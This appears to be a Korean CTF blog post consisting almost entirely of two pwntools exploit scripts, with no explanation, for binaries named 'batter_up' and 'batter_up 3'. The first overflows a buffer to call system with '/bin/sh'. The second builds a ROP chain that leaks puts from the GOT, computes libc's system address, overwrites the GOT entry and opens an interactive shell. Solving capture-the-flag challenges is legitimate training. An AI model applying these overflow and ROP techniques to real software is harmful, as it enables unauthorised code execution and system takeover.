batter_up

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
 
p = process("./batter_up")
elf = ELF("./batter_up")
 
system = elf.plt['system']
binsh = 0x804874a
print p.recv()
 
payload = ""
payload += "A"*48
payload += p32(system)
payload += "DDDD"
payload += p32(binsh)
 
p.sendline(payload)
 
p.interactive()

batter_up 3

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
 
p = process("./batter_up_3")
elf = ELF("./batter_up_3")
lib = ELF("./libc_e3d54f5709190f15a9c51089c70f2069771913c1.so.6")
 
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets = elf.plt['gets']
bss = elf.bss()
pr = 0x080483d1
ppr = 0x0804870a
pppr = 0x08048709
 
p.recv()
 
payload = ""
payload += "A"*44
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(puts_got)
 
payload += p32(gets)
payload += p32(pr)
payload += p32(bss)
 
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(bss)
 
payload += p32(gets)
payload += p32(pr)
payload += p32(puts_got)
 
payload += p32(puts_plt)
payload += "DDDD"
payload += p32(bss)
 
p.sendline(payload)
 
libc_puts = u32(p.recv(4))
log.info("libc_plt = {}".format(hex(libc_puts)))
libc_system = libc_puts - 0x24f00
log.info("libc_system = {}".format(hex(libc_system)))
p.sendline("/bin/sh\x00")
 
p.sendline(p32(libc_system))
 
p.interactive()

'CTF' 카테고리의 다른 글

hackzone 2019 pwn2 (Syscall)  (0) 2019.05.09
hackzone 2019 pwn1  (0) 2019.05.07
plaid 2019 can you guess me?  (0) 2019.04.15
codegate2019 aeiou  (0) 2019.02.23
CSAW2016 tutorial  (0) 2019.02.01

+ Recent posts

티스토리툴바